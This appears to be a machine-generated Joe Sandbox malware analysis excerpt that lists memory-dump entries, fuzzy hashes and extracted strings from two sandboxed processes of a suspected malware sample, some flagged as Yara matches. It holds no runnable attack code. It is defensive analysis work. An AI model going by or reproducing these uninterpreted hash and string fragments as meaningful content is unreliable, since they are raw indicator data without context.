                                                                      • Instruction ID: 3bb326ca3e93f6682d7e32f029daab7d7abeb8bdec1f351d23bcbd9d2996e236
                                                                      • Opcode Fuzzy Hash: dbe5c528d271e3bd1dfd92f15f52be8917921be16368f57322730e701cdf02e3
                                                                      • Instruction Fuzzy Hash: 8990023124151402D14171584409606408DA7D0241F95C012E0464554ECA558B56AB61
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 677851553975a4a7046df57deace99a9c056a1fdec45dcf403fd205f8a0cfa6f
                                                                      • Instruction ID: 1e628c9f37ef4381e56ca2f473b444473f142c0881deb00443d4bd3235a00602
                                                                      • Opcode Fuzzy Hash: 677851553975a4a7046df57deace99a9c056a1fdec45dcf403fd205f8a0cfa6f
                                                                      • Instruction Fuzzy Hash: B1900221242551525545B1584409507808AA7E0241795C012E1454950CC9269956D721
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 25188418642fc6000c43c66d010395ba50106c83eeaed617507803e6b2729414
                                                                      • Instruction ID: 677864dc0dd21d870003c6101793922c165d75a5754452fe4f5dde147d1c82a7
                                                                      • Opcode Fuzzy Hash: 25188418642fc6000c43c66d010395ba50106c83eeaed617507803e6b2729414
                                                                      • Instruction Fuzzy Hash: BA90022921351002D1807158540D60A408997D1202F95D415E0055558CCD1589695321
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: bf6fa61fbaa8ea75c188fc7e4b9f500925d985be0aa1ff05521c41c538fd9db1
                                                                      • Instruction ID: a2e6a2a6726fa29b439de52d4c1afd41d41aee1af41a84f1219470007fad0da7
                                                                      • Opcode Fuzzy Hash: bf6fa61fbaa8ea75c188fc7e4b9f500925d985be0aa1ff05521c41c538fd9db1
                                                                      • Instruction Fuzzy Hash: DF90022120555442D1007558540DA06408997D0205F55D011E10A4595DCA358951A231
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2381b3c9f3572fa4c5779736adb95c168b5a0a396a616974d3b0d8ecd8a93f36
                                                                      • Instruction ID: 4922e113465199c114abe7cece0f56d9c010621bf2419e4aee9dff38951904a7
                                                                      • Opcode Fuzzy Hash: 2381b3c9f3572fa4c5779736adb95c168b5a0a396a616974d3b0d8ecd8a93f36
                                                                      • Instruction Fuzzy Hash: 3490043130151003D140715C541D707C0CDF7F1301F55D011F0454554CDD15CD575333
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID: ___swprintf_l
                                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                      • API String ID: 48624451-2108815105
                                                                      • Opcode ID: da2f2cdeb9b691a006a212ac2c53cd19d2c3e5ed1fdd7a1e15aef72c7a892b83
                                                                      • Instruction ID: 1b33cda63415f5df6c9ef4acffec7eba6ab2969485ec0b8061baa2abddaf0a41
                                                                      • Opcode Fuzzy Hash: da2f2cdeb9b691a006a212ac2c53cd19d2c3e5ed1fdd7a1e15aef72c7a892b83
                                                                      • Instruction Fuzzy Hash: 5751F6B2A0011ABFDB11EF9C8980D7EFBB8BB482417648269F56DD7645D334DE9087E0
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID: ___swprintf_l
                                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                      • API String ID: 48624451-2108815105
                                                                      • Opcode ID: cdaa211ae0432f3ede8af6873652f2492339946ccb318fdff16f4c75f59e4408
                                                                      • Instruction ID: 977c72c6a50282427e5d19b2d85d917fadd0285aa8625e0ec6d6f9f118660e7e
                                                                      • Opcode Fuzzy Hash: cdaa211ae0432f3ede8af6873652f2492339946ccb318fdff16f4c75f59e4408
                                                                      • Instruction Fuzzy Hash: 465105B5A40646AECB30EF6DC89087FBBFCEF44601B44886DE99AD7641E674DA00C770
                                                                      Strings
                                                                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01944725
                                                                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 019446FC
                                                                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01944655
                                                                      • Execute=1, xrefs: 01944713
                                                                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01944742
                                                                      • ExecuteOptions, xrefs: 019446A0
                                                                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 01944787
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                      • API String ID: 0-484625025
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID: __aulldvrm
                                                                      • String ID: +$-$0$0
                                                                      • API String ID: 1302938615-699404926
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID: ___swprintf_l
                                                                      • String ID: %%%u$[$]:%u
                                                                      • API String ID: 48624451-2819853543
                                                                      Strings
                                                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 019402BD
                                                                      • RTL: Re-Waiting, xrefs: 0194031E
                                                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 019402E7
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                      • API String ID: 0-2474120054
                                                                      Strings
                                                                      • RTL: Re-Waiting, xrefs: 01947BAC
                                                                      • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01947B7F
                                                                      • RTL: Resource at %p, xrefs: 01947B8E
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                      • API String ID: 0-871070163
                                                                      APIs
                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0194728C
                                                                      Strings
                                                                      • RTL: Re-Waiting, xrefs: 019472C1
                                                                      • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01947294
                                                                      • RTL: Resource at %p, xrefs: 019472A3
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                      • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                      • API String ID: 885266447-605551621
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID: ___swprintf_l
                                                                      • String ID: %%%u$]:%u
                                                                      • API String ID: 48624451-3050659472
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID: __aulldvrm
                                                                      • String ID: +$-
                                                                      • API String ID: 1302938615-2137968064
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $$@
                                                                      • API String ID: 0-1194432280
                                                                      APIs
                                                                      • @_EH4_CallFilterFunc@8.LIBCMT ref: 0195CFBD
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.2561345341.00000000018A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_5_2_18a0000_NFhRxwbegd.jbxd
                                                                      Similarity
                                                                      • API ID: CallFilterFunc@8
                                                                      • String ID: @$@4Cw@4Cw
                                                                      • API String ID: 4062629308-3101775584
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4084033538.0000000003570000.00000040.00000001.00040000.00000000.sdmp, Offset: 03570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_3570000_gsolWhsjddFW.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: /$ R$&($'$':$'T$($+)$0$4$5$;D$<u$AZ$C$Dq$G-$J$Ox$TQ$V$`$c8$e`$g$h*$i$k$l$m$q$z$~${z
                                                                      • API String ID: 0-2491054771
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4084033538.0000000003570000.00000040.00000001.00040000.00000000.sdmp, Offset: 03570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_3570000_gsolWhsjddFW.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 6$O$S$\$s
                                                                      • API String ID: 0-3854637164
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4084033538.0000000003570000.00000040.00000001.00040000.00000000.sdmp, Offset: 03570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_3570000_gsolWhsjddFW.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: -G$Lf
                                                                      • API String ID: 0-1055479412
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4084033538.0000000003570000.00000040.00000001.00040000.00000000.sdmp, Offset: 03570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_3570000_gsolWhsjddFW.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4e0c0e05a3180629457462458cf4218b8d1a134c4f0cc6191c10f26ff9f38bc0
                                                                      • Instruction ID: 7f376a5aca184ea3566f293e1fe47e1666235ad3e1083b5d08ff3def3c3293b1
                                                                      • Opcode Fuzzy Hash: 4e0c0e05a3180629457462458cf4218b8d1a134c4f0cc6191c10f26ff9f38bc0
                                                                      • Instruction Fuzzy Hash: CF410CB1D11229AFDB04CF99D881AEEBBBCFF49710F10415AFA14E6240E7B09641CBA4
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4084033538.0000000003570000.00000040.00000001.00040000.00000000.sdmp, Offset: 03570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_3570000_gsolWhsjddFW.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5135da323445ef3c3097e7e7741681ab41f732bdf2234858e608911eb240bd1a
                                                                      • Instruction ID: 690ad8e05f478e3b16890f9fa236eb423261d4b0a51413498d24438b36ea5261
                                                                      • Opcode Fuzzy Hash: 5135da323445ef3c3097e7e7741681ab41f732bdf2234858e608911eb240bd1a
                                                                      • Instruction Fuzzy Hash: A031E2B5A01648AFCB14DF98D881EEEBBB9AF88700F108109F909A7344D734A851CFA4
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4084033538.0000000003570000.00000040.00000001.00040000.00000000.sdmp, Offset: 03570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_3570000_gsolWhsjddFW.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: fba5c8c8623f852feb632874af99dc9b5267436a6d353ff22b3e7c83f4994071
                                                                      • Instruction ID: bda04b9236d30a7654b3f67dc6849d3031d0faef3e380f675f6e25e9449be741
                                                                      • Opcode Fuzzy Hash: fba5c8c8623f852feb632874af99dc9b5267436a6d353ff22b3e7c83f4994071
                                                                      • Instruction Fuzzy Hash: 94310A75A00649AFCB14DF98C881EEFBBB9EF88700F108109F918A7344D730A9128FA1
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4084033538.0000000003570000.00000040.00000001.00040000.00000000.sdmp, Offset: 03570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_3570000_gsolWhsjddFW.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f3462de801c2f78f583b791dc1a8bb8013bf14c9cd4e93730fdb2671dbc51fb8
                                                                      • Instruction ID: 462d65b33d5f870fbeac3f86364a74389c3a4333d8805641c300766764350056
                                                                      • Opcode Fuzzy Hash: f3462de801c2f78f583b791dc1a8bb8013bf14c9cd4e93730fdb2671dbc51fb8
                                                                      • Instruction Fuzzy Hash: E8313A75A00649AFDB14DF98CC81EEFBBB9EF88700F108119F908AB344D734A8118FA1
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4084033538.0000000003570000.00000040.00000001.00040000.00000000.sdmp, Offset: 03570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_3570000_gsolWhsjddFW.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ba6bb6e35c3069740d6d0d7c063e14729f4f9182d76848d29cd12370d293e3ad
                                                                      • Instruction ID: f8c2eccb675cc23ece7abb74dfff7727057c77fc25e69a3bc9110c8dd498f90f
                                                                      • Opcode Fuzzy Hash: ba6bb6e35c3069740d6d0d7c063e14729f4f9182d76848d29cd12370d293e3ad
                                                                      • Instruction Fuzzy Hash: B82139B5A00649AFDB14DF98CC81EEFBBB9EF88700F008509F905AB244D774A915CFA5
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4084033538.0000000003570000.00000040.00000001.00040000.00000000.sdmp, Offset: 03570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_3570000_gsolWhsjddFW.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 17ba7a426a8541948fcf3018ecb7fbd4d2f7709fd3637c19a3ed6fb3efa9ea40
                                                                      • Instruction ID: d7ee8fe56bad5339b46669f5341423106526beca81821f7e46db34303486651c
                                                                      • Opcode Fuzzy Hash: 17ba7a426a8541948fcf3018ecb7fbd4d2f7709fd3637c19a3ed6fb3efa9ea40
                                                                      • Instruction Fuzzy Hash: 1911E9B63807147BF720DA159C83FAB776D9B84B10F254008FB08AE3C1D7A4B8114AB8
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4084033538.0000000003570000.00000040.00000001.00040000.00000000.sdmp, Offset: 03570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_3570000_gsolWhsjddFW.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: /$&($'$':$'T$($+)$0$4$5$;D$<u$AZ$C$Dq$G-$J$Ox$TQ$V$`$c8$e`$g$h*$i$k$l$m$q$z$~${
                                                                      • API String ID: 0-808712017
                                                                      • Opcode ID: be7c461cf5934487054bd827d7726ae8993deaec0117f7f195939b92848edf32
                                                                      • Instruction ID: 1aefe1a1d1bec4af8290619926a9f75ad3c37071cb774576312468b290ee6a08
                                                                      • Opcode Fuzzy Hash: be7c461cf5934487054bd827d7726ae8993deaec0117f7f195939b92848edf32
                                                                      • Instruction Fuzzy Hash: B0C139B0D05669CBEB61CF41C9987DEBBB1BB45308F1085C9C5583B281CBBA1AC9CF95
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4084033538.0000000003570000.00000040.00000001.00040000.00000000.sdmp, Offset: 03570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_3570000_gsolWhsjddFW.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $$$$%$)$)$.$5$>$B$E$F$F$H$J$Q$T$g$h$i$m$s$u$urlmon.dll$v$w$}$}
                                                                      • API String ID: 0-1002149817
                                                                      • Opcode ID: 7910ac4fe835690470d353283db70fae01acbf1182b370f301be357165bcb1e8
                                                                      • Instruction ID: 5dbd9bf289725fc2c15a8c1cb73a93d7ba7afa095c7c928b8001950f0a3425a2
                                                                      • Opcode Fuzzy Hash: 7910ac4fe835690470d353283db70fae01acbf1182b370f301be357165bcb1e8
                                                                      • Instruction Fuzzy Hash: E5C12EB1D113289ADB21DFA5CD44BEEBBB8AF44304F0081D9D50CBB241E7B54A88CFA5
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4084033538.0000000003570000.00000040.00000001.00040000.00000000.sdmp, Offset: 03570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_3570000_gsolWhsjddFW.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $2$I$I$\$e$g$i$l$l$m$o$r$r$r$r$t$t$t$x
                                                                      • API String ID: 0-3236418099
                                                                      • Opcode ID: 6ef1d1c855674922dea5499f1b6f951d3dcbc288913238e2771a42d0c75b9a10
                                                                      • Instruction ID: 9b21fb06a832c61c785b65cd70df3771a0e088fb28e0239ab1f31eeb5dc3a305
                                                                      • Opcode Fuzzy Hash: 6ef1d1c855674922dea5499f1b6f951d3dcbc288913238e2771a42d0c75b9a10
                                                                      • Instruction Fuzzy Hash: B9916FB590072CAAEB21DFA58C45FEEB7B8EF44300F44419DE508AA140EB755B89CFA5
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4084033538.0000000003570000.00000040.00000001.00040000.00000000.sdmp, Offset: 03570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_3570000_gsolWhsjddFW.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: "1*l$&lrr$',40$',40$*(&c$+1,.$,jc$//"l$C$c&-n$msmu$qs$qsck$tqmq$umrx$vmsc$vpwm$vpwm$vpwmqs
                                                                      • API String ID: 0-523877151
                                                                      • Opcode ID: e458661ef2265732b6c423b7a84f97b6a97688d37fccf291fc1a6979b3629f7c
                                                                      • Instruction ID: eb32f547f2de422368e5df1d0e8d962bc9cc901790a77f00e5a246f570de5760
                                                                      • Opcode Fuzzy Hash: e458661ef2265732b6c423b7a84f97b6a97688d37fccf291fc1a6979b3629f7c
                                                                      • Instruction Fuzzy Hash: 8521C8B4C053989BCF24DF96EA8269DBF30BB05704F209248D9153F215D77A0A85CF9A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4084033538.0000000003570000.00000040.00000001.00040000.00000000.sdmp, Offset: 03570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_3570000_gsolWhsjddFW.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: "1*l$&lrr$',40$',40$*(&c$+1,.$,jc$//"l$C$c&-n$msmu$qs$qsck$tqmq$umrx$vmsc$vpwm$vpwm$vpwmqs
                                                                      • API String ID: 0-523877151
                                                                      • Opcode ID: 5915565d0bb1f0ebe598f90a9ba0a55d8f774ce5c9d680fda0c3f8fd2e1cec76
                                                                      • Instruction ID: 38ea63ed7babead11b6cb817bc24a609e62721f3853936e3087649b9085fcfc2
                                                                      • Opcode Fuzzy Hash: 5915565d0bb1f0ebe598f90a9ba0a55d8f774ce5c9d680fda0c3f8fd2e1cec76
                                                                      • Instruction Fuzzy Hash: D121B7B4C053AC9BCF24DF96EA8269DBF70BB01704F20A248D9153F214D77A0A45CF9A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4084033538.0000000003570000.00000040.00000001.00040000.00000000.sdmp, Offset: 03570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_3570000_gsolWhsjddFW.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                                      • API String ID: 0-392141074
                                                                      • Opcode ID: ac108b0037730d8afdc5266e827761813c1a9451748b0465983686d5f7430558
                                                                      • Instruction ID: 9245df022bc2b94c11e1f541289f360a5469c03955b198c65efc25302bb71dfc
                                                                      • Opcode Fuzzy Hash: ac108b0037730d8afdc5266e827761813c1a9451748b0465983686d5f7430558
                                                                      • Instruction Fuzzy Hash: 21711CB5D00728AADB15DBA5CC41FEFBB7CBF08700F04459DE519AA180EB715B488FA5
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4084033538.0000000003570000.00000040.00000001.00040000.00000000.sdmp, Offset: 03570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_3570000_gsolWhsjddFW.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: D$\$e$e$i$l$n$r$r$w$x
                                                                      • API String ID: 0-685823316
                                                                      • Opcode ID: 344cdc8e5b6120e6ab6104b1ae08699e39eeb5692f43d076a6969cf7fd696278
                                                                      • Instruction ID: bbd62895a7d7b76e626571585929c796b1cca6bf59b9b5af45620ba5b04202cc
                                                                      • Opcode Fuzzy Hash: 344cdc8e5b6120e6ab6104b1ae08699e39eeb5692f43d076a6969cf7fd696278
                                                                      • Instruction Fuzzy Hash: 5C2173B5D11318AADF54DFD4DC85BEEBBB9AF04704F10815CE608BA180DBB516488FA4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4084033538.0000000003570000.00000040.00000001.00040000.00000000.sdmp, Offset: 03570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_3570000_gsolWhsjddFW.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: D$\$e$e$i$l$n$r$r$w$x
                                                                      • API String ID: 0-685823316
                                                                      • Opcode ID: 1e7f5b191d5725785edbd9e7f07703a6d69112c12a973df7ffaacb3d2e199a46
                                                                      • Instruction ID: 6baa3a79552a17aae95b9862e7a0eebc317d45b87ce723155414940adcc19538
                                                                      • Opcode Fuzzy Hash: 1e7f5b191d5725785edbd9e7f07703a6d69112c12a973df7ffaacb3d2e199a46
                                                                      • Instruction Fuzzy Hash: B43181B5D10318AADF44DFD0CC85BEEBBB9BF04704F10815DE6047A180DBB556488FA8
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4084033538.0000000003570000.00000040.00000001.00040000.00000000.sdmp, Offset: 03570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_3570000_gsolWhsjddFW.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: :$:$:$A$I$N$P$m$s$t
                                                                      • API String ID: 0-2304485323
                                                                      • Opcode ID: 949a5fb0898cb99fc21f7ad31f5db1c4b9e0092180e2a01c5e8397fc1a5288f0
                                                                      • Instruction ID: 70b4f315607a8da87afe26bd0ddb924164d3eeedabbed078b2cf5c6e32e6d1e3
                                                                      • Opcode Fuzzy Hash: 949a5fb0898cb99fc21f7ad31f5db1c4b9e0092180e2a01c5e8397fc1a5288f0
                                                                      • Instruction Fuzzy Hash: 6FD107B5900714AFDB50DBA5CC80FEEBBB9BF48300F58451DE209EB240EB78A915CB65
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4084033538.0000000003570000.00000040.00000001.00040000.00000000.sdmp, Offset: 03570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_3570000_gsolWhsjddFW.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: .$P$e$i$m$o$r$x
                                                                      • API String ID: 0-620024284
                                                                      • Opcode ID: 5cff5fd438651834b08a05cdecca2b813bb80e81ca741c25799cf09952a48148
                                                                      • Instruction ID: 836c8ced3c829126ede1ad47ad23c68f743cfcf84575e66347fc8066ace89de2
                                                                      • Opcode Fuzzy Hash: 5cff5fd438651834b08a05cdecca2b813bb80e81ca741c25799cf09952a48148
                                                                      • Instruction Fuzzy Hash: BD41B7B5800328B6DB15DBA1DC44FEF777CAF54300F40859DA50D6B140EBB557898FA5
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.4084033538.0000000003570000.00000040.00000001.00040000.00000000.sdmp, Offset: 03570000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_3570000_gsolWhsjddFW.jbxd
                                                                      Yara matches
                                                                      Similarity
